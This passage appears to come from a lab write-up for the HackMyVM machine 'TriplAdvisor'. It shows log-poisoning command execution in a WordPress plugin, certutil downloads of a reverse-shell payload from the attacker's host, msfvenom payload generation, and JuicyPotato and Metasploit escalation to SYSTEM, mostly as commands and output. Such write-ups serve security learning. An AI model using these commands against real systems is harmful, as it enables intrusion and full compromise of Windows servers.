reboot. 28  exploit\/windows\/local\/cve_2022_3699_lenovo_diagnostics_driver  No                       The target is not exploitable.\n 29  exploit\/windows\/local\/cve_2023_21768_afd_lpe                   No                       The target is not exploitable. The exploit only supports Windows 11 22H2\n 30  exploit\/windows\/local\/cve_2023_28252_clfs_driver               No                       The target is not exploitable. The target system does not have clfs.sys in system32\\drivers\\\n 31  exploit\/windows\/local\/gog_galaxyclientservice_privesc          No                       The target is not exploitable. 
Galaxy Client Service not found\n 32  exploit\/windows\/local\/ikeext_service                           No                       The check raised an exception.\n 33  exploit\/windows\/local\/lexmark_driver_privesc                   No                       The target is not exploitable. No Lexmark print drivers in the driver store\n 34  exploit\/windows\/local\/ms10_092_schelevator                     No                       The target is not exploitable. Windows Server 2008 R2 (6.1 Build 7600). is not vulnerable\n 35  exploit\/windows\/local\/ms15_078_atmfd_bof                       No                       Cannot reliably check exploitability.\n 36  exploit\/windows\/local\/ms16_014_wmi_recv_notif                  No                       The target is not exploitable.\n 37  exploit\/windows\/local\/ntapphelpcachecontrol                    No                       The check raised an exception.\n 38  exploit\/windows\/local\/nvidia_nvsvc                             No                       The check raised an exception.\n 39  exploit\/windows\/local\/panda_psevents                           No                       The target is not exploitable.\n 40  exploit\/windows\/local\/ricoh_driver_privesc                     No                       The target is not exploitable. No Ricoh driver directory found\n 41  exploit\/windows\/local\/srclient_dll_hijacking                   No                       The target is not exploitable. 
Target is not Windows Server 2012.\n 42  exploit\/windows\/local\/tokenmagic                               No                       The target is not exploitable.\n 43  exploit\/windows\/local\/virtual_box_opengl_escape                No                       The target is not exploitable.\n 44  exploit\/windows\/local\/webexec                                  No                       The check raised an exception.\n 45  exploit\/windows\/local\/win_error_cve_2023_36874                 No                       The target is not exploitable.\n\n[*] Post module execution completed<\/code><\/pre>\n<pre><code class=\"language-bash\"># kali3\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ curl &quot;http:\/\/tripladvisor:8080\/wordpress\/wp-content\/plugins\/editor\/\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\xampp\\apache\\logs\\access.log&amp;cmd=certutil+-urlcache+-split+-f+http:\/\/192.168.10.101:8888\/pentest.exe+C:\\Windows\\Temp\\pentest.exe&quot;\n192.168.56.1 - - [14\/Aug\/2024:10:42:52 -0700] &quot;GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\/xampp\/apache\/logs\/error.log HTTP\/1.1&quot; 200 5728866 &quot;-&quot; &quot;curl\/8.8.0&quot;\n192.168.56.1 - - [14\/Aug\/2024:10:43:07 -0700] &quot;GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\/xampp\/apache\/logs\/access.log HTTP\/1.1&quot; 200 272 &quot;-&quot; &quot;curl\/8.8.0&quot;\n192.168.56.1 - - [14\/Aug\/2024:10:44:38 -0700] &quot;GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\/xampp\/apache\/logs\/access.log HTTP\/1.1&quot; 200 504 &quot;-&quot; &quot;curl\/8.8.0&quot;\n192.168.56.1 - - [14\/Aug\/2024:10:52:26 -0700] &quot;GET 
\/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\/xampp\/apache\/logs\/access.log HTTP\/1.1&quot; 200 736 &quot;-&quot; &quot;curl\/8.8.0&quot;\n192.168.56.1 - - [15\/Aug\/2024:21:00:56 -0700] &quot;GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\/xampp\/apache\/logs\/access.log HTTP\/1.1&quot; 200 968 &quot;-&quot; &quot;curl\/8.8.0&quot;\n192.168.56.1 - - [25\/Nov\/2024:22:26:47 -0800] &quot;GET \/ HTTP\/1.1&quot; 302 - &quot;-&quot; &quot;curl\/8.10.1&quot;\n192.168.10.101 - - [04\/Jun\/2025:15:07:45 -0700] &quot;GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\\\xampp\\\\apache\\\\logs\\\\access.log HTTP\/1.1&quot; 200 1288 &quot;-&quot; &quot;Mozilla\/5.0 (X11; Linux x86_64; rv:109.0) Gecko\/20100101 Firefox\/115.0&quot;\n192.168.10.101 - - [04\/Jun\/2025:15:08:02 -0700] &quot;GET \/wordpress\/ HTTP\/1.1&quot; 200 22542 &quot;-&quot; &quot;****  Online  ****\n  0000  ...\n  1c00\nCertUtil: -URLCache command completed successfully.\n&quot;\nfe80::5479:dd94:1d27:478c - - [04\/Jun\/2025:15:08:07 -0700] &quot;POST \/wordpress\/wp-cron.php?doing_wp_cron=1749074886.8125000000000000000000 HTTP\/1.1&quot; 200 - &quot;http:\/\/tripladvisor:8080\/wordpress\/wp-cron.php?doing_wp_cron=1749074886.8125000000000000000000&quot; &quot;WordPress\/5.1.19; http:\/\/tripladvisor:8080\/wordpress&quot;\n192.168.10.101 - - [04\/Jun\/2025:15:08:35 -0700] &quot;GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\\\xampp\\\\apache\\\\logs\\\\access.log&amp;cmd=dir HTTP\/1.1&quot; 200 2754 &quot;-&quot; &quot;curl\/8.5.0&quot;\n192.168.10.101 - - [04\/Jun\/2025:15:40:23 -0700] &quot;GET 
\/wordpress\/wp-content\/plugins\/editor\/\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\\\xampp\\\\apache\\\\logs\\\\access.log&amp;cmd=certutil+-urlcache+-split+-f+http:\/\/192.168.10.101:8888\/revshell.exe+C:\\\\Windows\\\\Temp\\\\revshell.exe HTTP\/1.1&quot; 200 2326 &quot;-&quot; &quot;curl\/8.5.0&quot;\n192.168.10.101 - - [04\/Jun\/2025:15:43:49 -0700] &quot;GET \/wordpress\/wp-content\/plugins\/editor\/\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\\\xampp\\\\apache\\\\logs\\\\access.log&amp;cmd=C:\\\\Windows\\\\Temp\\\\revshell.exe HTTP\/1.1&quot; 500 1640 &quot;-&quot; &quot;curl\/8.5.0&quot;\n192.168.10.101 - - [04\/Jun\/2025:15:45:59 -0700] &quot;GET \/wordpress\/wp-content\/plugins\/editor\/\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\\\xampp\\\\apache\\\\logs\\\\access.log&amp;cmd=C:\\\\Windows\\\\Temp\\\\revshell.exe HTTP\/1.1&quot; 500 1640 &quot;-&quot; &quot;curl\/8.5.0&quot;\n192.168.10.101 - - [04\/Jun\/2025:16:04:32 -0700] &quot;GET \/wordpress\/wp-content\/plugins\/editor\/\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\\\xampp\\\\apache\\\\logs\\\\access.log&amp;cmd=C:\\\\Windows\\\\Temp\\\\revshell.exe HTTP\/1.1&quot; 200 3129 &quot;-&quot; &quot;curl\/8.5.0&quot;\n192.168.10.101 - - [04\/Jun\/2025:16:08:24 -0700] &quot;GET \/wordpress\/wp-content\/plugins\/editor\/\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\\\xampp\\\\apache\\\\logs\\\\access.log&amp;cmd=C:\\\\Windows\\\\Temp\\\\revshell.exe HTTP\/1.1&quot; 200 3405 &quot;-&quot; &quot;curl\/8.5.0&quot;\n192.168.10.101 - - [04\/Jun\/2025:16:11:23 -0700] &quot;GET \/wordpress\/wp-content\/plugins\/editor\/\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\\\xampp\\\\apache\\\\logs\\\\access.log&amp;cmd=C:\\\\Windows\\\\Temp\\\\revshell.exe HTTP\/1.1&quot; 500 
1640 &quot;-&quot; &quot;curl\/8.5.0&quot;\n192.168.10.101 - - [04\/Jun\/2025:16:36:03 -0700] &quot;GET \/wordpress\/wp-content\/plugins\/editor\/\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\\\xampp\\\\apache\\\\logs\\\\access.log&amp;cmd=C:\\\\Windows\\\\Temp\\\\revshell.exe HTTP\/1.1&quot; 500 1640 &quot;-&quot; &quot;curl\/8.5.0&quot;\n{&quot;success&quot;:true,&quot;data&quot;:{&quot;output&quot;:[]}}\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ curl &quot;http:\/\/tripladvisor:8080\/wordpress\/wp-content\/plugins\/editor\/\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\xampp\\apache\\logs\\access.log&amp;cmd=C:\\Windows\\Temp\\pentest.exe&quot; \n<\/code><\/pre>\n<h3>msf privilege escalation<\/h3>\n<p>The server version reported in the suggester output matches <code>Windows Server 2008 R2 (6.1 Build 7600).<\/code>, and other players&#039; write-ups seem to say that with the <code>SeImpersonatePrivilege<\/code> privilege <code>JuicyPotato<\/code> can be used for privilege escalation. Try msf first:<\/p>\n<pre><code class=\"language-bash\">msf6 post(multi\/recon\/local_exploit_suggester) &gt; use exploit\/windows\/local\/ms16_075_reflection_juicy\n[*] No payload configured, defaulting to windows\/meterpreter\/reverse_tcp\nmsf6 exploit(windows\/local\/ms16_075_reflection_juicy) &gt; options\n\nModule options (exploit\/windows\/local\/ms16_075_reflection_juicy):\n\n   Name     Current Setting                         Required  Description\n   ----     ---------------                         --------  -----------\n   CLSID    {4991d34b-80a1-4291-83b6-3328366b9097}  yes       Set CLSID value of the DCOM to trigger\n 
  SESSION                                          yes       The session to run this module on\n\nPayload options (windows\/meterpreter\/reverse_tcp):\n\n   Name      Current Setting  Required  Description\n   ----      ---------------  --------  -----------\n   EXITFUNC  none             yes       Exit technique (Accepted: &#039;&#039;, seh, thread, process, none)\n   LHOST     10.0.2.4         yes       The listen address (an interface may be specified)\n   LPORT     4444             yes       The listen port\n\nExploit target:\n\n   Id  Name\n   --  ----\n   0   Automatic\n\nView the full module info with the info, or info -d command.\n\nmsf6 exploit(windows\/local\/ms16_075_reflection_juicy) &gt; set session 1\nsession =&gt; 1\nmsf6 exploit(windows\/local\/ms16_075_reflection_juicy) &gt; set lhost 192.168.10.101\nlhost =&gt; 192.168.10.101\nmsf6 exploit(windows\/local\/ms16_075_reflection_juicy) &gt; set lport 2345\nlport =&gt; 2345\nmsf6 exploit(windows\/local\/ms16_075_reflection_juicy) &gt; run\n\n[*] Started reverse TCP handler on 192.168.10.101:2345 \n[+] Target appears to be vulnerable (Windows 2008 R2)\n[*] Launching notepad to host the exploit...\n[+] Process 3052 launched.\n[*] Reflectively injecting the exploit DLL into 3052...\n[*] Injecting exploit into 3052...\n[*] Exploit injected. Injecting exploit configuration into 3052...\n[*] Configuration injected. Executing exploit...\n[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.\n[*] Sending stage (176198 bytes) to 192.168.10.103\n[*] Meterpreter session 2 opened (192.168.10.101:2345 -&gt; 192.168.10.103:49190) at 2025-06-04 04:08:37 -0400\n\nmeterpreter &gt; getuid\nServer username: NT AUTHORITY\\SYSTEM\nmeterpreter &gt; shell\nProcess 2580 created.\nChannel 1 created.\nMicrosoft Windows [Version 6.1.7600]\nCopyright (c) 2009 Microsoft Corporation.  
All rights reserved.\n\nC:\\Windows\\system32&gt;cd c:\/users\/administrator\/desktop\ncd c:\/users\/administrator\/desktop\n\nc:\\Users\\Administrator\\Desktop&gt;dir\ndir\n Volume in drive C has no label.\n Volume Serial Number is BCB3-AE45\n\n Directory of c:\\Users\\Administrator\\Desktop\n\n08\/15\/2024  09:02 PM    &lt;DIR&gt;          .\n08\/15\/2024  09:02 PM    &lt;DIR&gt;          ..\n06\/30\/2024  10:10 AM                33 root.txt\n               1 File(s)             33 bytes\n               2 Dir(s)  23,797,780,480 bytes free\n\nc:\\Users\\Administrator\\Desktop&gt;type root.txt\ntype root.txt\n5b38df6802c305e752c8f02358721acc<\/code><\/pre>\n<p>Privilege escalation succeeded.<\/p>\n<h3>JuicyPotato privilege escalation<\/h3>\n<p>If you do not use msf, you need some related tools to escalate privileges:<\/p>\n<blockquote>\n<ul>\n<li><a href=\"https:\/\/github.com\/ohpe\/juicy-potato\/releases\/download\/v0.1\/JuicyPotato.exe\">https:\/\/github.com\/ohpe\/juicy-potato\/releases\/download\/v0.1\/JuicyPotato.exe<\/a><\/li>\n<\/ul>\n<\/blockquote>\n<p>For details on using the tool, see: <a href=\"https:\/\/ohpe.it\/juicy-potato\/\">https:\/\/ohpe.it\/juicy-potato\/<\/a><\/p>\n<p>Just follow the steps of <a href=\"https:\/\/ta0.fun\/posts\/637ff6f0\/\">ta0<\/a> and it is done:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506041737269.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506041737269.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250604162241702\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506041737270.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506041737270.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250604162406765\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506041737271.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506041737271.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250604162432905\" \/><\/div><\/p>\n<p>Find the one we want, then download it onto the target machine:<\/p>\n<blockquote>\n<ul>\n<li><a 
href=\"https:\/\/github.com\/ohpe\/juicy-potato\/blob\/master\/CLSID\/Windows_Server_2008_R2_Enterprise\/CLSID.list\">https:\/\/github.com\/ohpe\/juicy-potato\/blob\/master\/CLSID\/Windows_Server_2008_R2_Enterprise\/CLSID.list<\/a><\/li>\n<li><a href=\"https:\/\/ohpe.it\/juicy-potato\/Test\/test_clsid.bat\">https:\/\/ohpe.it\/juicy-potato\/Test\/test_clsid.bat<\/a><\/li>\n<\/ul>\n<\/blockquote>\n<p>It did not work here, so I rebooted the target machine. Note: do not download the files into the temp directory; it seems they cannot be executed from there.<\/p>\n<h4>First download the related test scripts<\/h4>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ rlwrap nc -lnvp 1234\nlistening on [any] 1234 ...\nconnect to [192.168.10.101] from (UNKNOWN) [192.168.10.103] 49190\nMicrosoft Windows [Version 6.1.7600]\nCopyright (c) 2009 Microsoft Corporation.  
All rights reserved.\n\nC:\\xampp\\htdocs\\wordpress\\wp-content\\plugins\\editor\\editor\\extensions\\pagebuilder\\includes&gt;cd c:\/users\ncd c:\/users\n\nc:\\Users&gt;dir\ndir\n Volume in drive C has no label.\n Volume Serial Number is BCB3-AE45\n\n Directory of c:\\Users\n\n06\/29\/2024  01:26 PM    &lt;DIR&gt;          .\n06\/29\/2024  01:26 PM    &lt;DIR&gt;          ..\n06\/29\/2024  08:09 PM    &lt;DIR&gt;          Administrator\n07\/13\/2009  09:52 PM    &lt;DIR&gt;          Public\n06\/29\/2024  08:11 PM    &lt;DIR&gt;          websvc\n               0 File(s)              0 bytes\n               5 Dir(s)  23,796,097,024 bytes free\n\nc:\\Users&gt;cd websvc\/desktop\ncd websvc\/desktop\n\nc:\\Users\\websvc\\Desktop&gt;certutil.exe -urlcache -split -f http:\/\/192.168.10.101:8888\/CLSID.list\ncertutil.exe -urlcache -split -f http:\/\/192.168.10.101:8888\/CLSID.list\n****  Online  ****\n  0000  ...\n  37c2\nCertUtil: -URLCache command completed successfully.\n\nc:\\Users\\websvc\\Desktop&gt;certutil.exe -urlcache -split -f http:\/\/192.168.10.101:8888\/JuicyPotato.exe\ncertutil.exe -urlcache -split -f http:\/\/192.168.10.101:8888\/JuicyPotato.exe\n****  Online  ****\n  000000  ...\n  054e00\nCertUtil: -URLCache command completed successfully.\n\nc:\\Users\\websvc\\Desktop&gt;certutil.exe -urlcache -split -f http:\/\/192.168.10.101:8888\/test_clsid.bat\ncertutil.exe -urlcache -split -f http:\/\/192.168.10.101:8888\/test_clsid.bat\n****  Online  ****\n  0000  ...\n  011d\nCertUtil: -URLCache command completed successfully.\n\nc:\\Users\\websvc\\Desktop&gt;test_clsid.bat\ntest_clsid.bat\n{72A7994A-3092-4054-B6BE-08FF81AEEFFC} 10000\n{84D586C4-A423-11D2-B943-00C04F79D22F} 10000\n{b8f87e75-d1d5-446b-931c-3f61b97bca7a} 10000\n{4D111E08-CBF7-4f12-A926-2C7920AF52FC} 10000\n{3B35075C-01ED-45bc-9999-DC2BBDEAC171} 10000\n{228fb8f7-fb53-4fd5-8c7b-ff59de606c5b} 10000\n{01D0A625-782D-4777-8D4E-547E6457FAD5} 10000\n{4BC67F23-D805-4384-BCA3-6F1EDFF50E2C} 
10000\n{010911E2-F61C-479B-B08C-43E6D1299EFE} 10000\n{2b72133b-3f5b-4602-8952-803546ce3344} 10000\n{86d5eb8a-859f-4c7b-a76b-2bd819b7a850} 10000\n{3050f4d8-98B5-11CF-BB82-00AA00BDCE0B} 10000\n{3be9934e-4d1f-4e31-8bc3-8efc710ee0f2} 10000\n{87BB326B-E4A0-4de1-94F0-B9F41D0C6059} 10000\n{E6442437-6C68-4f52-94DD-2CFED267EFB9} 10000\n{6d8ff8e0-730d-11d4-bf42-00b0d0118b56} 10000\n{853c9738-9e98-45af-aef4-dc0c6237b388} 10000\n------------------------\n\nc:\\Users\\websvc\\Desktop&gt;dir\ndir\n Volume in drive C has no label.\n Volume Serial Number is BCB3-AE45\n\n Directory of c:\\Users\\websvc\\Desktop\n\n06\/04\/2025  05:48 PM    &lt;DIR&gt;          .\n06\/04\/2025  05:48 PM    &lt;DIR&gt;          ..\n06\/04\/2025  05:47 PM            14,274 CLSID.list\n06\/04\/2025  05:47 PM           347,648 JuicyPotato.exe\n06\/04\/2025  05:56 PM             1,101 result.log\n06\/04\/2025  05:48 PM               285 test_clsid.bat\n06\/30\/2024  10:10 AM                33 user.txt\n               5 File(s)        363,341 bytes\n               2 Dir(s)  23,792,906,240 bytes free\n\nc:\\Users\\websvc\\Desktop&gt;type result.log\ntype result.log\n{9678f47f-2435-475c-b24a-4606f8161c16};TRIPLADVISOR\\websvc\n{98068995-54d2-4136-9bc9-6dbcb0a4683f};TRIPLADVISOR\\websvc\n{0289a7c5-91bf-4547-81ae-fec91a89dec5};TRIPLADVISOR\\websvc\n{9acf41ed-d457-4cc1-941b-ab02c26e4686};TRIPLADVISOR\\websvc\n{03ca98d6-ff5d-49b8-abc6-03dd84127020};NT AUTHORITY\\SYSTEM\n{69AD4AEE-51BE-439b-A92C-86AE490E8B30};NT AUTHORITY\\SYSTEM\n{F087771F-D74F-4C1A-BB8A-E16ACA9124EA};NT AUTHORITY\\SYSTEM\n{6d18ad12-bde3-4393-b311-099c346e6df9};NT AUTHORITY\\SYSTEM\n{d20a3293-3341-4ae8-9aaf-8e397cb63c34};NT AUTHORITY\\SYSTEM\n{1BE1F766-5536-11D1-B726-00C04FB926AF};NT AUTHORITY\\LOCAL SERVICE\n{5BF9AA75-D7FF-4aee-AA2C-96810586456D};NT AUTHORITY\\LOCAL SERVICE\n{A47979D2-C419-11D9-A5B4-001185AD2B89};NT AUTHORITY\\LOCAL SERVICE\n{8F5DF053-3013-4dd8-B5F4-88214E81C0CF};NT AUTHORITY\\SYSTEM\n{752073A1-23F2-4396-85F0-8FDB879ED0ED};NT 
AUTHORITY\\SYSTEM\n{C49E32C6-BC8B-11d2-85D4-00105A1F8304};NT AUTHORITY\\SYSTEM\n{8BC3F05E-D86B-11D0-A075-00C04FB68820};NT AUTHORITY\\SYSTEM\n{9B1F122C-2982-4e91-AA8B-E071D54F2A4D};NT AUTHORITY\\SYSTEM\n{e60687f7-01a1-40aa-86ac-db1cbf673334};NT AUTHORITY\\SYSTEM\n# Every NT AUTHORITY\\SYSTEM entry here can be used<\/code><\/pre>\n<p>Then escalate privileges with the tool:<\/p>\n<pre><code class=\"language-bash\">c:\\Users\\websvc\\Desktop&gt;JuicyPotato.exe\nJuicyPotato.exe\nJuicyPotato v0.1 \n\nMandatory args: \n-t createprocess call: &lt;t&gt; CreateProcessWithTokenW, &lt;u&gt; CreateProcessAsUser, &lt;*&gt; try both\n-p &lt;program&gt;: program to launch\n-l &lt;port&gt;: COM server listen port\n\nOptional args: \n-m &lt;ip&gt;: COM server listen address (default 127.0.0.1)\n-a &lt;argument&gt;: command line argument to pass to program (default NULL)\n-k &lt;ip&gt;: RPC server ip address (default 127.0.0.1)\n-n &lt;port&gt;: RPC server listen port (default 135)\n-c &lt;{clsid}&gt;: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})\n-z only test CLSID and print token&#039;s user\n\nc:\\Users\\websvc\\Desktop&gt;JuicyPotato.exe -l 2345 -p c:\\Users\\websvc\\Desktop\\revshell.exe -t * -c {C49E32C6-BC8B-11d2-85D4-00105A1F8304}\nJuicyPotato.exe -l 2345 -p c:\\Users\\websvc\\Desktop\\revshell.exe -t * -c {C49E32C6-BC8B-11d2-85D4-00105A1F8304}\nTesting {C49E32C6-BC8B-11d2-85D4-00105A1F8304} 2345\n....\n[+] authresult 0\n{C49E32C6-BC8B-11d2-85D4-00105A1F8304};NT AUTHORITY\\SYSTEM\n\n[+] CreateProcessWithTokenW OK\n\nc:\\Users\\websvc\\Desktop&gt;JuicyPotato.exe -l 2345 -p c:\\Users\\websvc\\Desktop\\revrootshell.exe -t * -c {C49E32C6-BC8B-11d2-85D4-00105A1F8304}\nJuicyPotato.exe -l 2345 -p c:\\Users\\websvc\\Desktop\\revrootshell.exe -t * -c {C49E32C6-BC8B-11d2-85D4-00105A1F8304}\n# 
The -l here is the local COM server listen port; just pick one that is not commonly used\nTesting {C49E32C6-BC8B-11d2-85D4-00105A1F8304} 2345\n....\n[+] authresult 0\n{C49E32C6-BC8B-11d2-85D4-00105A1F8304};NT AUTHORITY\\SYSTEM\n\n[+] CreateProcessWithTokenW OK<\/code><\/pre>\n<p>Here is the record of the downloads made in between and the generation of the new reverse shell:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ ll           \ntotal 392\n-rw-r--r-- 1 kali kali   2246 Jun  4 00:59 44340.txt\n-rw-r--r-- 1 kali kali  14274 Jun  4 04:41 CLSID.list\n-rw-r--r-- 1 kali kali 347648 Dec  6  2021 JuicyPotato.exe\n-rw-r--r-- 1 kali kali   7168 Jun  4 03:48 pentest.exe\ndrwxr-xr-x 3 root root   4096 Jun  4 00:14 reports\n-rw-r--r-- 1 kali kali     87 Jun  4 00:51 reports.json\ndrwxr-xr-x 3 kali kali   4096 Jun  4 00:51 Result\n-rw-r--r-- 1 kali kali   7168 Jun  4 02:28 revshell.exe\n-rw-r--r-- 1 kali kali    285 Jun  4 04:41 test_clsid.bat\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ updog -p 8888\n[+] Serving \/home\/kali\/temp\/TriplAdvisor...\nWARNING: This is a development server. Do not use it in a production deployment. 
Use a production WSGI server instead.\n * Running on all addresses (0.0.0.0)\n * Running on http:\/\/127.0.0.1:8888\n * Running on http:\/\/10.0.2.4:8888\nPress CTRL+C to quit\n192.168.10.103 - - [04\/Jun\/2025 04:43:33] &quot;GET \/revshell.exe HTTP\/1.1&quot; 200 -\n192.168.10.103 - - [04\/Jun\/2025 04:43:33] &quot;GET \/revshell.exe HTTP\/1.1&quot; 200 -\n192.168.10.103 - - [04\/Jun\/2025 04:47:09] &quot;GET \/CLSID.list HTTP\/1.1&quot; 200 -\n192.168.10.103 - - [04\/Jun\/2025 04:47:09] &quot;GET \/CLSID.list HTTP\/1.1&quot; 200 -\n192.168.10.103 - - [04\/Jun\/2025 04:47:34] &quot;GET \/JuicyPotato.exe HTTP\/1.1&quot; 200 -\n192.168.10.103 - - [04\/Jun\/2025 04:47:34] &quot;GET \/JuicyPotato.exe HTTP\/1.1&quot; 200 -\n192.168.10.103 - - [04\/Jun\/2025 04:47:53] &quot;GET \/test_clsid.bat HTTP\/1.1&quot; 200 -\n192.168.10.103 - - [04\/Jun\/2025 04:47:53] &quot;GET \/test_clsid.bat HTTP\/1.1&quot; 200 -\n192.168.10.103 - - [04\/Jun\/2025 05:00:39] &quot;GET \/revshell.exe HTTP\/1.1&quot; 200 -\n192.168.10.103 - - [04\/Jun\/2025 05:00:42] &quot;GET \/revshell.exe HTTP\/1.1&quot; 200 -\n^C\n[!] Exiting!\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ msfvenom --payload windows\/x64\/shell_reverse_tcp LHOST=192.168.10.101 LPORT=2345 -f exe -o revrootshell.exe \n[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload\n[-] No arch selected, selecting arch: x64 from the payload\nNo encoder specified, outputting raw payload\nPayload size: 460 bytes\nFinal size of exe file: 7168 bytes\nSaved as: revrootshell.exe\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ updog -p 8888                                                                                               \n[+] Serving \/home\/kali\/temp\/TriplAdvisor...\nWARNING: This is a development server. Do not use it in a production deployment. 
Use a production WSGI server instead.\n * Running on all addresses (0.0.0.0)\n * Running on http:\/\/127.0.0.1:8888\n * Running on http:\/\/10.0.2.4:8888\nPress CTRL+C to quit\n192.168.10.103 - - [04\/Jun\/2025 05:09:56] &quot;GET \/revrootshell.exe HTTP\/1.1&quot; 200 -\n192.168.10.103 - - [04\/Jun\/2025 05:09:56] &quot;GET \/revrootshell.exe HTTP\/1.1&quot; 200 -\n^C\n[!] Exiting!\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ rlwrap nc -lnvp 2345\nlistening on [any] 2345 ...\nwhoami\nconnect to [192.168.10.101] from (UNKNOWN) [192.168.10.103] 49636\nMicrosoft Windows [Version 6.1.7600]\nCopyright (c) 2009 Microsoft Corporation.  All rights reserved.\n\nC:\\Windows\\system32&gt;whoami\nnt authority\\system\n\nC:\\Windows\\system32&gt;<\/code><\/pre>\n<p>Finally got the root shell!<\/p>\n<h2>Using the credentials<\/h2>\n<p>As far as getting the root flag goes, this is already finished, but there is a further extension; for details see this write-up: https:\/\/www.linuxsec.org\/2024\/10\/hackmyvm-tripladvisor-writeup.html . Here I only reproduce it to learn:<\/p>\n<p>Use <code>Mimikatz<\/code> to extract the credentials, then log in with <code>impacket-psexec<\/code><\/p>\n<pre><code 